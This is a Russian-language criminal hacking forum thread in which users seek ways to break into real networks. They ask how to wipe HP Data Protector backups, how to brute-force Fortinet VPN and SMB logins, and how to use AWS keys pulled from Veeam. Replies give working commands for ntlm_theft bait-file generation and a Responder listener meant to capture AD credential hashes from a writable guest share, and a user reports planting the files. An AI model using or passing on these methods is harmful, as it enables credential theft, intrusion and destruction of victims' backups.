• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Всем привет!
Кто сталкивался с бэкапилкой HP data protector?
1736156043975.png

1736156143030.png


Вопрос в том, куда складываются и где хранятся бэкапы? В destination видно название оборудования, но IP не смог достать. Даже если найти IP, возможно ли будет к нему подключиться, а потом накрыть или удалить бэкапы?
 
При сканировании nmap реального ip сайта частно возникает ситуация, что nmap выводит службу на открытом порте, но никак не может определить ее версию и версию ОС. Искал информацию в курсах по этичному хакингу, пробовал banner grabbing, сканировать через метасплоит.
Но определить версию службы и ОС не получается, на многих серверах. Подскажите пожалуйста, что делать или в какую сторону гуглить, чтобы узнать версию служб?

21/tcp open ftp -------------ProFTPD or KnFTPD
22/tcp open ssh?
23/tcp open telnet?
25/tcp open smtp?
26/tcp open smtp ----------------Sendmail
37/tcp open time?
53/tcp open domain?
79/tcp open finger?
80/tcp open http --------------------Apache httpd
81/tcp open hosts2-ns?
88/tcp open kerberos-sec?
106/tcp open pop3pw?
110/tcp open pop3 -----------------------Dovecot pop3d
111/tcp open rpcbind?
113/tcp open ident?
119/tcp open nntp?
135/tcp open msrpc?
139/tcp open netbios-ssn?
143/tcp open imap --------------------------Dovecot imapd
144/tcp open news?
179/tcp open bgp?
199/tcp open smux?
389/tcp open ldap?
427/tcp open svrloc?
443/tcp open ssl/http--------------------------Apache httpd
993/tcp open ssl/imap-------------------------Dovecot imapd
995/tcp open ssl/pop3-------------------------Dovecot pop3d
Aggressive OS guesses: Garmin Virb Elite action camera (92%), Grandstream GXP1105 VoIP phone (87%), Oracle Virtualbox lwIP NAT bridge (86%)
No exact OS matches for host (test conditions non-ideal)
 
кто-то может подсказать более актуальный способ получения первоначального доступа , брутить впн-гейт например модуль мсф fortinet-fortigate-vpn на какие-то популярные логины или искать сетки где наружу торчит 445 порт и брутить юзеров и потом уже по ним гонять пароли в надежде на успех???
 
кто-то может подсказать более актуальный способ получения первоначального доступа , брутить впн-гейт например модуль мсф fortinet-fortigate-vpn на какие-то популярные логины или искать сетки где наружу торчит 445 порт и брутить юзеров и потом уже по ним гонять пароли в надежде на успех???
445 порт гонять чревато, собственно как и 3389. Велика вероятность блока УЗ после 5 неверных попыток, т.к. это настройка майков по-умолчанию.
 
Всем привет. Вытащил из veeam access и private key s3 amazon. При попытке подключиться пишет что неверный access key, но если попробовать в самом veeam протестировать аккаунт то подключается и беки на него пишутся каждый день. В чем может быть загвоздка?
 
Вытащил из veeam access и private key s3 amazon.
Это как? AWSAccesskey ?
А подключался через aws configure?
там же учетка валидная логинится через
"AWSAKey"
"AWSSKey"
Кстати а как вообще с Амазоном работать? Кто что с ним делает? Есть партнерки у кого под них решение есть?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Всем привет. Нужно получить учетку AD. Есть гостевая шара с правами на запись что можно придумать? 😼
 
Всем привет. Нужно получить учетку AD. Есть гостевая шара с правами на запись что можно придумать? 😼
Сгенерить этой тулзой - https://github.com/Greenwolf/ntlm_theft файлики и положить на шару.
Включить у себя Responder и ждать прилета хешиков с учетками
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Сгенерить этой тулзой - https://github.com/Greenwolf/ntlm_theft файлики и положить на шару.
Включить у себя Responder и ждать прилета хешиков с учетками
python3 ntlm_theft.py --generate all --server ip_server -f Commerce

Где ip_server - это айпи который мне выдал vpn.
Autorun.inf 'Commerce-(externalcell).xlsx' Commerce.htm Commerce.jnlp Commerce.pdf Commerce.scf Commerce.wax
Commerce.application 'Commerce-(frameset).docx' 'Commerce-(icon).url' Commerce.lnk 'Commerce-(remotetemplate).docx' 'Commerce-(stylesheet).xml' desktop.ini
Commerce.asx 'Commerce-(fulldocx).xml' 'Commerce-(includepicture).docx' Commerce.m3u Commerce.rtf 'Commerce-(url).url' zoom-attack-instructions.txt

какой файл выбрать?

Responder прям так и запускать, конфиг не надо редактировать?

sudo responder -I tun0


Я загрузил .rtf в шару. Остается ждать пока кто-то откроет мой документ?
 
python3 ntlm_theft.py --generate all --server ip_server -f Commerce

Где ip_server - это айпи который мне выдал vpn.
Autorun.inf 'Commerce-(externalcell).xlsx' Commerce.htm Commerce.jnlp Commerce.pdf Commerce.scf Commerce.wax
Commerce.application 'Commerce-(frameset).docx' 'Commerce-(icon).url' Commerce.lnk 'Commerce-(remotetemplate).docx' 'Commerce-(stylesheet).xml' desktop.ini
Commerce.asx 'Commerce-(fulldocx).xml' 'Commerce-(includepicture).docx' Commerce.m3u Commerce.rtf 'Commerce-(url).url' zoom-attack-instructions.txt

какой файл выбрать?

Responder прям так и запускать, конфиг не надо редактировать?

sudo responder -I tun0


Я загрузил .rtf в шару. Остается ждать пока кто-то откроет мой документ?
Грузи все файлы, открывать ничего не надо, основные .url .pdf .scf .lnk
Ну какой интерфейс у тебя, так и запускай - sudo responder -I eth0 например
 
Пожалуйста, обратите внимание, что пользователь заблокирован
1739888486225.png

Грузи все файлы, открывать ничего не надо, основные .url .pdf .scf .lnk
Ну какой интерфейс у тебя, так и запускай - sudo responder -I eth0 например
1739888521557.png


готово
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ты же видишь, что у тебя ерор? тебе следует порт сменить
освободил порт

1739888906433.png
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Он ругался на 80, пофиг в данном случае, т.к. с шары отстук будет по SMB протоколу, ну тут собсно только ждать и надеяться.
а есть способы чтобы просто зашли в шару, а не по файлу кликнули.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх